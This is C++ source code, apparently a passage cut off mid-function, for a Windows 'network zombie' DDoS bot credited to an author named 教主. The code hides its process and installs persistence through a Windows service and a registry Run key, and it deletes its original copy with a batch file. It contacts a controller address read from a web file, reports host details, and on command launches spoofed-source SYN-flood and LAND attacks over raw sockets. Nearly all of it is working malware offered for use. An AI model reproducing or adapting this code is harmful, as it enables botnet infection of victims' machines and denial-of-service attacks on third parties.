教主网络僵尸服务端主要代码

// HDService.cpp : Defines the entry point for the console application. //

//网络僵尸服务端代码 作者:教主 www.jiaozhu.net //请保留作者版权 #include

"stdafx.h" #include "HDService.h" #include "winsock2.h" #include "winsvc.h"

#include "windows.h" #include "afxinet.h" #include "HideProcess.h" //#include

"shellapi.h"

#define WM_SOCKET WM_USER+1000

#define SEQ 0x28376839

#define FAKE_IP "10.156.124.1" //伪装IP的起始值，本程序的伪装IP覆盖一个B类网段

#define ServiceName "www.jiaozhu.net"

#ifdef _DEBUG

#define new DEBUG_NEW

#undef THIS_FILE

static char THIS_FILE[] = __FILE__;

#endif

/////////////////////////////////////////////////////////////////////////////

// The one and only application object

CWinApp theApp;

using namespace std;

SERVICE_STATUS service_status_ss;

SERVICE_STATUS_HANDLE handle_service_status;

SC_HANDLE scm,svc;

SOCKET sock_client;

char systeminfor[256];

HANDLE ghThread;

HWND hWnd;

BOOL gbIsNT;

char ipfile[256];//ip文件

char installname[256]; //exe文件名称

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)

{

Readme();

//::MessageBox(NULL,ipfile,NULL,MB_OK);

//::MessageBox(NULL,installname,NULL,MB_OK);

//Readme();

//return -1;

//UninstallService();

//return -1;

int nRetCode = 0;

gbIsNT=FALSE;

//****************************************//自删除

char CurrDirBuff[256];

char SysDirBuff[256];

int DirLen=sizeof(CurrDirBuff);

::GetCurrentDirectory(DirLen,CurrDirBuff);

::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));

//SaveLogToFile("out");

if (_stricmp(CurrDirBuff,SysDirBuff)!=0)

{

//SaveLogToFile("in");

//::MessageBox(NULL,"winmain",NULL,MB_OK);

char filename[256];

char This_File[MAX_PATH];

strcpy(filename,SysDirBuff);

strcat(filename,"\\");

strcat(filename,installname);

memset(This_File,0,sizeof(This_File));

GetModuleFileName(NULL, This_File, sizeof(This_File));

if(::CopyFile(This_File,filename,FALSE)==0) return -1;

PROCESS_INFORMATION pinfo;

STARTUPINFO sinfo;

memset(&pinfo,0,sizeof(pinfo));

memset(&sinfo,0,sizeof(sinfo));

//SaveLogToFile("uninstall()");

uninstall();

//ShellExecute(NULL,"open",filename,NULL,SysDirBuff,SW_HIDE);

CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);

//SaveLogToFile("CreateProcess()");

ExitProcess(0);

}

//******************************//创建互斥对象

//HANDLE hMutex=::CreateMutex(NULL,FALSE,"HDServer");

//if (GetLastError() == ERROR_ALREADY_EXISTS) return -1;

//******************************//取操作系统类型

DWORD dwVersion=::GetVersion();

// 得到操作系统的版本号

if(dwVersion >= 0x80000000)

// 操作系统是Win9x，不是WinNt

{

typedef DWORD(CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

//定义RegisterServiceProcess()函数的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL=LoadLibrary("KERNEL32");

//加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL

lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

//得到RegisterServiceProcess()函数的地址

lpRegisterServiceProcess(GetCurrentProcessId(),1);

//执行RegisterServiceProcess()函数,隐藏本进程

FreeLibrary(hDLL);

//卸载动态链接库

}else

{

gbIsNT=TRUE;

}

if (gbIsNT)

{

//隐藏进程

HideProcess();

/*******************************************/

//服务入口表

SERVICE_TABLE_ENTRY service_tab_entry[2];

service_tab_entry[0].lpServiceName=ServiceName; //线程名字

service_tab_entry[0].lpServiceProc=ServiceMain; //线程入口地址

//可以有多个线程，最后一个必须为NULL

service_tab_entry[1].lpServiceName=NULL;

service_tab_entry[1].lpServiceProc=NULL;

if (StartServiceCtrlDispatcher(service_tab_entry)==0)

{

//int i=::GetLastError();

//char aa[3];

//::MessageBox(NULL,itoa(i,aa,10),NULL,MB_OK);

InstallService();

}

}

else

{

start();

}

return nRetCode;

}

/***********************************************/

//服务的真正入口点函数

void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)

{

service_status_ss.dwServiceType=SERVICE_WIN32;

service_status_ss.dwCurrentState=SERVICE_START_PENDING;

service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;

service_status_ss.dwServiceSpecificExitCode=0;

service_status_ss.dwWaitHint=0;

service_status_ss.dwCheckPoint=0;

service_status_ss.dwWin32ExitCode=0;

if ((handle_service_status=RegisterServiceCtrlHandler(ServiceName,Handler))==0)

{

//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);

}//一个服务对应一个控制处理器

service_status_ss.dwCurrentState=SERVICE_RUNNING;

service_status_ss.dwWaitHint=0;

service_status_ss.dwCheckPoint=0;

::SetServiceStatus(handle_service_status,&service_status_ss);

//::MessageBox(NULL,"start","tell",MB_OK);

start();

return ;

}

/***********************************************/

//服务控制器

void WINAPI Handler(DWORD dwControl)

{

switch(dwControl)

{

case SERVICE_CONTROL_STOP:

service_status_ss.dwCurrentState=SERVICE_STOPPED;

::SetServiceStatus(handle_service_status,&service_status_ss);

break;

case SERVICE_CONTROL_CONTINUE:

service_status_ss.dwCurrentState=SERVICE_RUNNING;

::SetServiceStatus(handle_service_status,&service_status_ss);

break;

case SERVICE_CONTROL_PAUSE:

service_status_ss.dwCurrentState=SERVICE_PAUSED;

::SetServiceStatus(handle_service_status,&service_status_ss);

break;

case SERVICE_CONTROL_INTERROGATE:

break;

}

::SetServiceStatus(handle_service_status,&service_status_ss);

}

/***********************************************/

void InstallService()

{

char szSysDir[256];

memset(szSysDir,0,sizeof(szSysDir));

::GetSystemDirectory(szSysDir,sizeof(szSysDir));

strcat(szSysDir,"\\");

strcat(szSysDir,installname);

scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);

if (scm!=NULL)

{

svc=::CreateService(scm,ServiceName,ServiceName,SERVICE_ALL_ACCESS,

SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,

SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szSysDir,NULL,NULL,NULL,NULL,NULL);

svc=::OpenService(scm,ServiceName,SERVICE_START);

if (svc!=NULL)

{

::StartService(svc,0,NULL);

::CloseServiceHandle(svc);

}

::CloseServiceHandle(scm);

}

}

/***********************************************/

void UninstallService()

{

scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);

if (scm!=NULL)

{

svc=::OpenService(scm,ServiceName,SERVICE_ALL_ACCESS);

if (svc!=NULL)

{

::DeleteService(svc);

::CloseServiceHandle(svc);

}

::CloseServiceHandle(scm);

}

}

/************************************************/

int start()

{

int ErrorCode;

WSADATA WsaData;

struct sockaddr_in DestAddr; //上线地址结构

char url[256];

MSG msg;

WNDCLASS wndc;

LPSTR szAppName="HDService";

wndc.style=0;

wndc.lpfnWndProc=WndProc;

wndc.cbClsExtra=0;

wndc.cbWndExtra=0;

wndc.hInstance=NULL;

wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);

wndc.hCursor=LoadCursor(NULL,IDC_ARROW);

wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);

wndc.lpszMenuName=NULL;

wndc.lpszClassName=szAppName;

RegisterClass(&wndc);

hWnd=CreateWindow(szAppName,"HDos",

WS_OVERLAPPEDWINDOW,

CW_USEDEFAULT,CW_USEDEFAULT,

CW_USEDEFAULT,CW_USEDEFAULT,

NULL,NULL,NULL,NULL);

ShowWindow(hWnd,SW_HIDE);

UpdateWindow(hWnd);

//****************************************

memset(url,0,sizeof(url));

strcpy(url,strlwr(ipfile));

//::MessageBox(NULL,url,NULL,MB_OK);

//strcpy(url,"http://192.168.1.111/ip.jpg");

char html[256]; //获取的网页

char ClientIP[16]; //客户端ip

char ClientPort[5]; //客户端端口

char *point; //指针

char ComputerName[256]; //计算机名

char MemorySize[20]; //内存大小

char SendBuff[256]; //发送缓存

char OsName[64]; //操作系统类型

//******************************************

switch(GetOS())

{

case VER_PLATFORM_WIN32_WINDOWS:

lstrcpy(OsName,"Windows 9x");

RegMe();

break;

case VER_PLATFORM_WIN32_NT:

lstrcpy(OsName,"Windows NT/2000/XP");

break;

}

//******************************//取计算机名

memset(ComputerName,0,sizeof(ComputerName));

DWORD len=sizeof(ComputerName);

if ( !GetComputerName(ComputerName,&len)) return -1;

//******************************//取内存大小

MEMORYSTATUS mem;

mem.dwLength=sizeof(mem);

GlobalMemoryStatus(&mem);

memset(MemorySize,0,sizeof(MemorySize));

strcpy(MemorySize,itoa(mem.dwTotalPhys/1024/1024+2,MemorySize,10));

//******************************//获取网页内容

memset(html,0,sizeof(html));

strcpy(html,strlwr(GetHttpFile(url)));

//MessageBox(NULL,html,NULL,MB_OK);

//*****************************//获取客户端ip和端口

point=html;

if(strstr(html,"http://jiaozhu")!=NULL)

{

point=point+strlen("http://jiaozhu");

}

if(strstr(point,":")!=NULL)

{

memset(ClientIP,0,sizeof(ClientIP));

strncpy(ClientIP,point,strcspn(point,":"));

point=point+strcspn(point,":")+1;

if(strstr(point,"end")!=NULL)

{

memset(ClientPort,0,sizeof(ClientPort));

strncpy(ClientPort,point,strcspn(point,"end"));

}

}

//::MessageBox(NULL,ClientIP,NULL,MB_OK);

//::MessageBox(NULL,ClientPort,NULL,MB_OK);

//*************************************************

HANDLE hThread;

unsigned long uiThreadID=0;

CLIENTPARA *clientpa;

try

{

if((ErrorCode=WSAStartup(MAKEWORD(2,2),&WsaData))!=0)

{

return -1;

}

sock_client=::socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

if (sock_client==INVALID_SOCKET)

{

return -1;

}

//上线地址结构

memset(&DestAddr,0,sizeof(DestAddr));

DestAddr.sin_family=AF_INET;

DestAddr.sin_addr.s_addr=inet_addr(ClientIP);

DestAddr.sin_port=htons(atoi(ClientPort));

//while (1)

{

if(connect(sock_client,(sockaddr*)&DestAddr,sizeof(DestAddr))==SOCKET_ERROR )

{

Sleep(3000);

}

//连接上线

memset(SendBuff,0,sizeof(SendBuff));

strcat(SendBuff,"<CMD>000</CMD><CPNAME>");

strcat(SendBuff,ComputerName);

strcat(SendBuff,"</CPNAME><OSNAME>");

strcat(SendBuff,OsName);

strcat(SendBuff,"</OSNAME><MEM>");

strcat(SendBuff,MemorySize);

strcat(SendBuff,"</MEM>");

strcat(SendBuff,"\r\n");

memset(systeminfor,0,sizeof(systeminfor));

strcpy(systeminfor,SendBuff);

if (SOCKET_ERROR!=send(sock_client,SendBuff,sizeof(SendBuff),0))

{

}

//发送上线消息

if (WSAAsyncSelect(sock_client,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE)==SOCKET_ERROR)

{

}

//开始线程

clientpa=new CLIENTPARA;

memset(clientpa,0,sizeof(clientpa));

strcpy(clientpa->IP,ClientIP);

strcpy(clientpa->port,ClientPort);

hThread=(HANDLE)::CreateThread(NULL,0,SocketThreadProc,clientpa,CREATE_SUSPENDED,&uiThreadID);

if (hThread!=NULL)

{

ResumeThread(hThread);

}

}

}

catch(...)

{}

while(GetMessage(&msg,NULL,0,0))

{

TranslateMessage(&msg);

DispatchMessage(&msg);

}

}

//***********************************************//自删除

void uninstall(void)//Thanks to Spybot

{

char batfile[MAX_PATH];

char tempdir[MAX_PATH];

char tcmdline[MAX_PATH];

char cmdline[MAX_PATH];

char This_File[MAX_PATH];

HANDLE f;

DWORD r;

PROCESS_INFORMATION pinfo;

STARTUPINFO sinfo;

GetTempPath(sizeof(tempdir), tempdir);

sprintf(batfile, "%s\\rs.bat", tempdir);

f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);

if (f != INVALID_HANDLE_VALUE)

{

// write a batch file to remove our executable once we close

WriteFile(f, "@echo off\r\n"

":start\r\nif not exist \"\"%1\"\" goto done\r\n"

"del /F \"\"%1\"\"\r\n"

"del \"\"%1\"\"\r\n"

"goto start\r\n"

":done\r\n"

"del /F %temp%\rs.bat\r\n"

"del %temp%\r.bat\r\n", 105, &r, NULL);

CloseHandle(f);

memset(&sinfo, 0, sizeof(STARTUPINFO));

sinfo.cb = sizeof(sinfo);

sinfo.wShowWindow = SW_HIDE;

memset(This_File,0,sizeof(This_File));

GetModuleFileName(NULL, This_File, sizeof(This_File));

sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line

ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line

// execute the batch file

CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);

}

}

////**************************************************

//注册自启动

void RegMe(void)

{

HKEY hkey=HKEY_LOCAL_MACHINE;

char lpSubKey[256]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";

HKEY phkResult;

char lpValue[256];

memset(lpValue,0,sizeof(lpValue));

strcpy(lpValue,installname);

int len=sizeof(lpValue);

if(::RegOpenKeyEx(hkey,lpSubKey,0,KEY_ALL_ACCESS,&phkResult)!=ERROR_SUCCESS)

{

::RegCreateKeyEx(hkey,lpSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_WRITE,NULL,&phkResult,NULL);

}

//如果不存在值，就新建

if (RegQueryValueEx(hkey,lpSubKey,NULL,NULL,(unsigned char *)&lpValue,(unsigned long *)&len)!=ERROR_SUCCESS)

::RegSetValueEx(phkResult,lpValue,0,REG_SZ,(unsigned char*)&lpValue,sizeof(lpValue));

::RegCloseKey(phkResult);

}

///************************************************

char* GetHttpFile(char url[])

{

CInternetSession session("My Session");

CHttpConnection* pServer = NULL;

CHttpFile* pFile = NULL;

/********************************///获取主机名

char szIPFile[256]; //ip文件名

char szHostName[256]; //主机名

char *str;

str=url;

if(strstr(url,"http://")!=NULL)

{

str=str+::strlen("http://");

}

if(strstr(str,"/")!=NULL)

{

::memset(szHostName,0,sizeof(szHostName));

strncpy(szHostName,str,strcspn(str,"/"));

str=str+strcspn(str,"/");

strcpy(szIPFile,str);

}

/********************************///下载网页文件

char szBuff[65535];

try

{

CString strServerName;

CString strObject;

INTERNET_PORT nPort;

DWORD dwRet;

nPort=80;

strServerName.Format(szHostName);

strObject.Format(szIPFile);

pServer = session.GetHttpConnection(strServerName, nPort);

pFile = pServer->OpenRequest(CHttpConnection::HTTP_VERB_GET, strObject);

pFile->SendRequest();

pFile->QueryInfoStatusCode(dwRet);

if (dwRet == HTTP_STATUS_OK)

{

::memset(szBuff,0,sizeof(szBuff));

UINT nRead = pFile->Read(szBuff, 65534);

}

delete pFile;

delete pServer;

}

catch (...)

{

//catch errors from WinInet

}

session.Close();

return szBuff;

}

///************************************************//获取操作系统类型

DWORD WINAPI GetOS()

{

OSVERSIONINFO os;

os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);

GetVersionEx(&os);

switch(os.dwPlatformId)

{

case VER_PLATFORM_WIN32_WINDOWS:

return VER_PLATFORM_WIN32_WINDOWS;

case VER_PLATFORM_WIN32_NT:

return VER_PLATFORM_WIN32_NT;

}

}

//*************************************************

//连接线程//每30秒检测是否断线，并连接

unsigned long CALLBACK SocketThreadProc(LPVOID pParam)

{

char html[512];

char *point;

char ClientIP[32];

char ClientPort[6];

CLIENTPARA *clientp=(CLIENTPARA*)pParam;

if (clientp==NULL)

return -1;

char port[6] ;

strcpy(port,clientp->port);

char IP[32];

memcpy(IP, clientp->IP, sizeof(IP));

delete clientp;

struct sockaddr_in TargAddr;

memset(&TargAddr,0,sizeof(TargAddr));

TargAddr.sin_family=AF_INET;

TargAddr.sin_addr.s_addr=inet_addr(IP);

TargAddr.sin_port=htons(atoi(port));

while (1)

{

if(connect(sock_client,(sockaddr*)&TargAddr,sizeof(TargAddr))==SOCKET_ERROR )

{

Sleep(3000);

int i=::WSAGetLastError();

/*char errorcode[5];

itoa(i,errorcode,10);

MessageBox(NULL,errorcode,NULL,MB_OK);*/

if (i==10056)

{

Sleep(30000);

}

else //if (i==10038)

{

//如果sock中断，创建sock

sock_client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

//connect(sock_client,(sockaddr*)&TargAddr,sizeof(TargAddr));

Sleep(30000);

memset(html,0,sizeof(html));

strcpy(html,strlwr(GetHttpFile(ipfile)));

//MessageBox(NULL,html,NULL,MB_OK);

//*****************************//获取客户端ip和端口

point=html;

if(strstr(html,"http://jiaozhu")!=NULL)

{

point=point+strlen("http://jiaozhu");

}

if(strstr(point,":")!=NULL)

{

memset(ClientIP,0,sizeof(ClientIP));

strncpy(ClientIP,point,strcspn(point,":"));

point=point+strcspn(point,":")+1;

if(strstr(point,"end")!=NULL)

{

memset(ClientPort,0,sizeof(ClientPort));

strncpy(ClientPort,point,strcspn(point,"end"));

memset(&TargAddr,0,sizeof(TargAddr));

TargAddr.sin_family=AF_INET;

TargAddr.sin_addr.s_addr=inet_addr(ClientIP);

TargAddr.sin_port=htons(atoi(ClientPort));

//::SaveLogToFile(ipfile);

//::SaveLogToFile(html);

//::SaveLogToFile(ClientIP);

//::SaveLogToFile(ClientPort);

}

}

//break;

}

}

else

{

send(sock_client,systeminfor,sizeof(systeminfor),0);

WSAAsyncSelect(sock_client,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);

Sleep(30000);

}

Sleep(1000);

}

return 0;

}

//*************************************************

//*******************************************************

LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)

{

char buff[256];

char ip[32];

char port[6];

char * p=NULL;

CLIENTPARA *clientpa;

unsigned long uiThreadID=0;

switch(message)

{

case WM_SOCKET:

if(WSAGETSELECTERROR(lParam))

{

closesocket(wParam);

break;

}

switch(WSAGETSELECTEVENT(lParam))

{

//连接

case FD_ACCEPT:

break;

//读取输入，如是回车则执行命令

//不是将输入复制到缓冲区

case FD_READ:

if (recv(sock_client,buff,sizeof(buff),0)!=SOCKET_ERROR)

{

//::MessageBox(NULL,buff,NULL,MB_OK);

strcpy(buff,strlwr(buff));

//开始攻击

if(strncmp(buff,"001",3)==0)

{

p=buff;

if (strstr(buff,"[ip]")!=NULL)

{

p=buff+strlen("001[ip]");

strcpy(buff,p);

if(strstr(buff,"[port]")!=NULL)

{

memset(ip,0,sizeof(ip));

strncpy(ip,buff,strcspn(buff,"[ip]"));

//::MessageBox(NULL,ip,NULL,MB_OK);

p=buff+strlen(ip)+strlen("[port]");

memset(port,0,sizeof(port));

if (strstr(p,"end")!=NULL)

{

strncpy(port,p,strcspn(p,"end"));

//::MessageBox(NULL,port,NULL,MB_OK);

//开始线程

clientpa=new CLIENTPARA;

memset(clientpa,0,sizeof(clientpa));

strcpy(clientpa->IP,ip);

strcpy(clientpa->port,port);

//clientpa->s=sock_client;

if(ghThread==NULL)

{

ghThread=(HANDLE)::CreateThread(NULL,0,LandDDOSFunction,clientpa,CREATE_SUSPENDED,&uiThreadID);

if (ghThread!=NULL)

{

//::MessageBox(NULL,"START DDOSFUNCTION",NULL,MB_OK);

ResumeThread(ghThread);

}

}

}

}

}

}

//结束工具

if(strncmp(buff,"002",3)==0)

{

if (ghThread!=NULL)

{

::TerminateThread(ghThread,0);

//::MessageBox(NULL,"STOP DDOSFUNCTION",NULL,MB_OK);

ghThread=NULL;

}

}

}

//MessageBox(NULL,"FD_READ",NULL,MB_OK);

break;

case FD_WRITE:

//MessageBox(NULL,"FD_WRITE",NULL,MB_OK);

break;

case FD_CLOSE:

//MessageBox(NULL,"FD_CLOSE",NULL,MB_OK);

closesocket(wParam);

break;

}

break;

case WM_DESTROY:

PostQuitMessage(0);

break;

default:

return DefWindowProc(hWnd,message,wParam,lParam);

}

return 0;

}

//*********************************************************

//***************************************************************

unsigned long CALLBACK DDOSFunction(LPVOID dParam)

{

CLIENTPARA *clientp=(CLIENTPARA*)dParam;

if (clientp==NULL)

return -1;

char SYN_DEST_IP[32];

char port[6];

char SendBuf[128];

WSADATA WsaData;

SOCKET SockRaw=(SOCKET)NULL;

struct sockaddr_in DestAddr;

IP_HEADER ip_header;

TCP_HEADER tcp_header;

int datasize,ErrorCode,Counter,flag,FakeIPNet,FakeIPHost;

int TimeOut=2000,SendSEQ=0;

memset(SYN_DEST_IP,0,sizeof(SYN_DEST_IP));

memset(port,0,sizeof(port));

strcpy(SYN_DEST_IP,clientp->IP);

strcpy(port,clientp->port);

//初始化SOCKET

if((ErrorCode=WSAStartup(MAKEWORD(2,2),&WsaData))!=0)

{

ExitProcess(ErrorCode);

}

SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);

if (SockRaw==INVALID_SOCKET)

{

ExitProcess(ErrorCode);

}

flag=TRUE;

ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(CHAR *)&flag,sizeof(int));

if (ErrorCode==SOCKET_ERROR)

{

return 1;

}

__try

{

ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));

if (ErrorCode==SOCKET_ERROR)

{

return 2;

}

memset(&DestAddr,0,sizeof(DestAddr));

DestAddr.sin_family=AF_INET;

DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);

FakeIPNet=inet_addr(FAKE_IP);

FakeIPHost=ntohl(FakeIPNet);

//填充IP首部

ip_header.h_verlen=(4<<4|sizeof(ip_header)/sizeof(unsigned long));

//高四位IP版本号，低四位首部长度

ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度（字节）

ip_header.ident=1; //16位标识

ip_header.frag_and_flags=0; //3位标志位

ip_header.ttl=128; //8位生存时间TTL

ip_header.proto=IPPROTO_TCP; //8位协议(TCP,UDP…)

ip_header.checksum=0; //16位IP首部校验和

ip_header.sourceIP=htonl(FakeIPHost+SendSEQ); //32位源IP地址

ip_header.destIP=inet_addr(SYN_DEST_IP); //32位目的IP地址

//填充TCP首部

tcp_header.th_sport=htons(::rand()); //源端口号

tcp_header.th_dport=htons(atoi(port)); //目的端口号

tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号

tcp_header.th_ack=0; //ACK序列号置为0

tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位

tcp_header.th_flag=2; //SYN 标志

tcp_header.th_win=htons(16384); //窗口大小

tcp_header.th_urp=0; //偏移

tcp_header.th_sum=0; //校验和

//填充TCP伪首部（用于计算校验和，并不真正发送）

psd_header.saddr=ip_header.sourceIP; //源地址

psd_header.daddr=ip_header.destIP; //目的地址

psd_header.mbz=0;

psd_header.ptcl=IPPROTO_TCP; //协议类型

psd_header.tcpl=htons(sizeof(tcp_header)); //TCP首部长度

while(1) {

//每发送10,240个报文输出一个标示符

//printf(".");

for(Counter=0;Counter<10240;Counter++)

{

Sleep(10);

if(SendSEQ++==65536) SendSEQ=1; //序列号循环

//更改IP首部

ip_header.checksum=0; //16位IP首部校验和

ip_header.sourceIP=htonl(FakeIPHost+SendSEQ); //32位源IP地址

//更改TCP首部

tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号

tcp_header.th_sum=0; //校验和

//更改TCP Pseudo Header

psd_header.saddr=ip_header.sourceIP;

//计算TCP校验和，计算校验和时需要包括TCP pseudo header

::memset(SendBuf,0,sizeof(SendBuf));

memcpy(SendBuf,&psd_header,sizeof(psd_header));

memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));

tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));

//计算IP校验和

memcpy(SendBuf,&ip_header,sizeof(ip_header));

memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));

memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4);

datasize=sizeof(ip_header)+sizeof(tcp_header);

ip_header.checksum=checksum((USHORT *)SendBuf,datasize);

//填充发送缓冲区

memcpy(SendBuf,&ip_header,sizeof(ip_header));

//发送TCP报文

ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr, sizeof(DestAddr));

//if (ErrorCode==SOCKET_ERROR)

//printf("\nSend Error:%d\n",GetLastError());

}//End of for

}//End of While

}//End of try

__finally

{

if(SockRaw != INVALID_SOCKET)

closesocket(SockRaw);

WSACleanup();

//printf("end");

}

}

//*****************************************************

USHORT checksum(USHORT *buffer,int size)

{

unsigned long cksum=0;

while (size>1)

{

cksum+=*buffer++;

size-=sizeof(USHORT);

}

if (size)

{

cksum+=*(UCHAR*)buffer;

}

cksum = (cksum >> 16) + (cksum & 0xffff);

cksum += (cksum >>16);

return (USHORT)(~cksum);

}

//*****************************************************

void Readme()

{

char peizhi[7];

char pzpos[29];

char tempstr[1000];

char szThis_file[256];

try

{

//SaveLogToFile("Readme()");

memset(szThis_file,0,sizeof(szThis_file));

::GetModuleFileName(NULL,szThis_file,sizeof(szThis_file));

CFile cf;

cf.Open(szThis_file,CFile::modeRead,NULL);

memset(peizhi,0,7);

cf.Seek(cf.GetLength()-7,CFile::begin);

cf.Read(peizhi,7);

//if(strcmp(peizhi,"HGZVIP1")==0)

{

//::MessageBox(NULL,peizhi,NULL,MB_OK);

cf.Seek(cf.GetLength()-36,CFile::begin);

cf.Read(pzpos,29);

int j=0,len=0;

char *p,*q;

p=pzpos;

//::MessageBox(NULL,pzpos,NULL,MB_OK);

for(;j<29;j++)

{

len=len+(*p);

p=p+1;

}

cf.Seek(cf.GetLength()-36-len,CFile::begin);

memset(tempstr,0,1000);

cf.Read(tempstr,len);

//安装名称

len=0;

p=pzpos;

for(j=1;j<=1;j++)

{

len=len+(*p);

p=p+1;

}

q=tempstr+len;

memset(installname,0,sizeof(installname));

::strncpy(installname,q,(*p));

//SaveLogToFile(installname);

//ip文件

len=0;

p=pzpos;

for(j=1;j<=13;j++)

{

len=len+(*p);

p=p+1;

}

q=tempstr+len;

memset(ipfile,0,sizeof(ipfile));

::strncpy(ipfile,q,(*p));

//SaveLogToFile(ipfile);

delete p,q;

cf.Close();

}

}

catch(...)

{

}

}

//************************************************

/***********************************************/

//保存日志

void SaveLogToFile(char *content)

{

CFile logfile;

CString strTime;

strTime=CTime::GetCurrentTime().Format("%H:%M:%S ");

logfile.Open("c:\\HDService.log",CFile::modeWrite|CFile::modeCreate|CFile::modeNoTruncate,NULL);

logfile.SeekToEnd();

logfile.Write(strTime,strTime.GetLength());

logfile.Write(content,strlen(content));

logfile.Write("\r\n",strlen("\r\n"));

logfile.Close();

}

/***********************************************/

//CheckSum:计算校验和的子函数

USHORT Landchecksum(USHORT *buffer, int size)

{

unsigned long cksum=0;

while(size >1)

{

cksum+=*buffer++;

size -=sizeof(USHORT);

}

if(size )

{

cksum += *(UCHAR*)buffer;

}

cksum = (cksum >> 16) + (cksum & 0xffff);

cksum += (cksum >>16);

return (USHORT)(~cksum);

}

/***********************************************/

unsigned long Landresolve(char *host)

{

long i;

struct hostent *he;

if((i=inet_addr(host))<0)

if((he=gethostbyname(host))==NULL)

return(0);

else

return(*(unsigned long *)he->h_addr);

return(i);

}

/***********************************************/

unsigned long CALLBACK LandDDOSFunction(LPVOID dParam)

{

//传入参数

CLIENTPARA *clientp=(CLIENTPARA*)dParam;

if (clientp==NULL)

return -1;

WSADATA WSAData;

SOCKET sock;

SOCKADDR_IN addr_in;

IP_HEADER ipHeader;

TCP_HEADER tcpHeader;

//psd_header psdHeader;

char szSendBuf[40]={0};

BOOL flag;

int Land;

if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)

{

return -1;

}

if ((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)

{

return -2;

}

//设置ip选项

flag=true;

if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)

{

return -3;

}

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(atoi(clientp->port));

addr_in.sin_addr.S_un.S_addr=Landresolve(clientp->IP);

//填充IP首部

ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));

ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));

ipHeader.ident=htons(0xF1C);

ipHeader.frag_and_flags=0;

ipHeader.ttl=255;

ipHeader.proto=IPPROTO_TCP;

ipHeader.checksum=0;

ipHeader.sourceIP=Landresolve(clientp->IP);

ipHeader.destIP=ipHeader.sourceIP;

//填充TCP首部

tcpHeader.th_sport=htons(atoi(clientp->port));

tcpHeader.th_dport=htons(atoi(clientp->port));

tcpHeader.th_seq=htonl(0xF1C);

tcpHeader.th_ack=1;

tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);

tcpHeader.th_flag=2; //修改这里来实现不同的标志位探测，2是SYN，1是FIN，16是ACK探测 等等

tcpHeader.th_win=htons(2048);

tcpHeader.th_urp=0;

tcpHeader.th_sum=0;

psd_header.saddr=ipHeader.sourceIP;

psd_header.daddr=ipHeader.destIP;

psd_header.mbz=0;

psd_header.ptcl=IPPROTO_TCP;

psd_header.tcpl=htons(sizeof(tcpHeader));

//计算校验和

memcpy(szSendBuf, &psd_header, sizeof(psd_header));

memcpy(szSendBuf+sizeof(psd_header), &tcpHeader, sizeof(tcpHeader));

tcpHeader.th_sum=Landchecksum((USHORT *)szSendBuf,sizeof(psd_header)+sizeof(tcpHeader));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

